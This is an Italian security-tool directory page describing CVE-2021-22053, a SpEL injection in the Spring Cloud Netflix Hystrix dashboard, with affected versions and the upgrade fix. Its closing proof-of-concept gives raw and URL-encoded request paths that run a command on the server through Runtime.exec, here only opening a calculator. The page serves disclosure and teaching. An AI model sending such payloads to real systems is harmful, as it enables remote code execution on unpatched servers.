Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
spring-cloud-netflix-hystrix-dashboard-cve-2021-22053 — Vulnerabilità di risoluzione del template della dashboard Hystrix di Spring Cloud Netflix CVE-2021-22053 | Kitploit
Strumenti/GitHubGitHub/seccoder-security-lab/spring-cloud-netflix-hystrix-dashboard-cve-2021-22053
Analisi delle VulnerabilitàAnalisi del CodiceExploitSfruttamento di Applicazioni WebApprendimento e Formazione
GitHubseccoder-security-lab/spring-cloud-netflix-hystrix-dashboard-cve-2021-22053

spring-cloud-netflix-hystrix-dashboard-cve-2021-22053

Vulnerabilità di risoluzione del template della dashboard Hystrix di Spring Cloud Netflix CVE-2021-22053

Vedi Repository
37813 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2021-22053: Vulnerabilità di risoluzione dei template del dashboard Hystrix di Spring Cloud Netflix

Gravità

Alta

Fornitore

Spring by VMware

Descrizione

Le applicazioni che utilizzano sia spring-cloud-netflix-hystrix-dashboard che spring-boot-starter-thymeleaf espongono un modo per eseguire codice inviato all'interno del path dell'URI della richiesta durante la risoluzione dei template delle viste. Quando viene effettuata una richiesta a /hystrix/monitor;[dati forniti dall'utente], gli elementi del path successivi a hystrix/monitor vengono valutati come espressioni SpringEL, che possono portare all'esecuzione di codice.

Prodotti VMware e Versioni Interessati

La gravità è alta se non diversamente specificato.

  • Spring Cloud Netflix
    • Dalla 2.2.0.RELEASE alla 2.2.9.RELEASE
    • Anche le versioni precedenti non supportate sono interessate

Mitigazione

Gli utenti delle versioni interessate dovrebbero applicare la seguente mitigazione: gli utenti dovrebbero effettuare l'aggiornamento alla 2.2.10.RELEASE+. Non sono necessari altri passaggi. Le versioni che hanno risolto questo problema includono:

  • Spring Cloud Netflix
    • 2.2.10.RELEASE+

Riconoscimenti

Questa vulnerabilità è stata identificata e segnalata in modo responsabile da threedr3am del SecCoder Security Lab ([email protected]).

Riferimenti

https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L

Cronologia

2021-11-17: Pubblicato il rapporto iniziale della vulnerabilità.

POC

raw:

root@kitploit:~
http://127.0.0.1:8080/hystrix/;a=a/__${T (java.lang.Runtime).getRuntime().exec("open -a calculator")}__::.x/

encode:

root@kitploit:~
http://127.0.0.1:8080/hystrix/;a=a/__$%7BT%20(java.lang.Runtime).getRuntime().exec(%22open%20-a%20calculator%22)%7D__::.x/

PS. La barra diagonale '/' non può essere portata nel comando.

Scarica lo strumento